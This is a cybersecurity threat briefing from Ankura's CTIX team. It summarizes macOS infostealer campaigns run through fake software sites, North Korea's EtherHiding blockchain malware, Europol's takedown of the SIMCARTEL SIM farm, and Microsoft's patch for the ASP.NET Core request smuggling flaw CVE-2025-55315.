Malware Activity
Targeting macOS Users and Cryptocurrency Ecosystems
Recent cyber threats have evolved to target different digital environments with sophisticated methods. For instance, on macOS, hackers are deploying fake websites mimicking popular platforms like Homebrew, LogMeIn, and TradingView. The websites trick users into executing malicious commands in Terminal which leads to malware infections such as AMOS and Odyssey. These malicious programs are designed to steal sensitive information, including passwords, cryptocurrency data, and personal files. They are secretly collecting and sending data to remote attackers. Malware gains root access, manipulates system processes, and remains hidden to avoid detection. Meanwhile, a North Korean threat group has adopted a novel tactic called EtherHiding. EtherHiding involves embedding malware within blockchain-based smart contracts. This approach leverages the decentralized and pseudonymous nature of blockchain to evade detection and make takedown efforts difficult. The campaign targets crypto developers through social engineering. The campaigns include fake job offers and malware disguised as legitimate software resulting in multiple cryptocurrency thefts. These developments highlight the increasing sophistication of cybercriminals in exploiting both traditional and emerging technologies to carry out data theft and financial crimes. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
- BleepingComputer: Google Ads for Fake Homebrew LogMeIn Sites Push Infostealers article
- InfoSecurityMagazine: NK Hackers Use EtherHiding to Steal Crypto article
Threat Actor Activity
Europol Disrupts Massive Criminal SIM Farm Network in Operation SIMCARTEL
Europol's coordinated law enforcement operation, dubbed Operation SIMCARTEL, has successfully disrupted a sophisticated cybercrime-as-a-service (CaaS) platform operating a SIM farm. This platform allowed criminals worldwide to use phone numbers registered to others for various cybercrimes, including phishing, smishing, extortion, investment fraud, and fraudulent schemes. The operation resulted in the arrest of seven (7) individuals, including five (5) Latvian nationals, and the seizure of 1,200 SIM box devices containing 40,000 active SIM cards. Authorities from Austria, Estonia, Finland, and Latvia participated in the operation, dismantling five (5) servers and seizing two (2) websites promoting illegal services. The platform enabled the creation of more than 49 million online accounts, facilitating cyber fraud cases causing financial losses of approximately €5 million ($5.8 million) in Austria and Latvia. The SIM cards, bought from nearly eighty (80) countries, were used to create fake social media accounts, obscuring identities for criminal activities. Europol highlighted the network's technical sophistication and its global impact, emphasizing the ongoing investigation to uncover the full extent of the network.
Vulnerabilities
Microsoft Patches Highest-Ever Rated ASP.NET Core Vulnerability
Microsoft has released patches for a critical HTTP request smuggling vulnerability affecting the Kestrel web server in ASP.NET Core, marking the framework’s highest-ever CVSS score at 9.9/10. The flaw tracked as CVE-2025-55315, allows attackers to embed a hidden HTTP request within another, potentially bypassing authentication, hijacking user credentials, leaking sensitive data, tampering with files, or triggering denial-of-service (DoS) conditions. The vulnerability’s real-world impact depends heavily on how each application is developed and deployed, particularly whether reverse proxies strip smuggled requests and whether proper validation checks exist. Microsoft’s security program manager Barry Dorrans emphasized that, while the worst-case scenario involves a full security feature bypass enabling privilege escalation or injection attacks, exploitation is unlikely unless applications contain flawed request-handling logic. The vulnerability affects all supported ASP.NET Core versions, including 2.3, 8.0, 9.0, and the 10.0 pre-release, as well as Visual Studio 2022 (versions 17.10–17.14). CTIX analysts urge immediate patching via .NET updates or by upgrading to Kestrel.Core version 2.3.6, understanding that the vulnerability is not yet known to have been exploited but poses serious risk if left unmitigated.
- Bleeping Computer: CVE-2025-55315 Article
- Security Week: CVE-2025-55315 Article
- The Register: CVE-2025-55315 Article
📧 Never Miss a Briefing
Stay informed and secure. Subscribe to Ankura's Cyber Flash Update, a bi-weekly briefing curated by top cybersecurity experts. Receive timely insights on emerging threats, vulnerabilities and malicious actors to keep your systems secure.
Join the Cyber Flash Update community today.
© Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
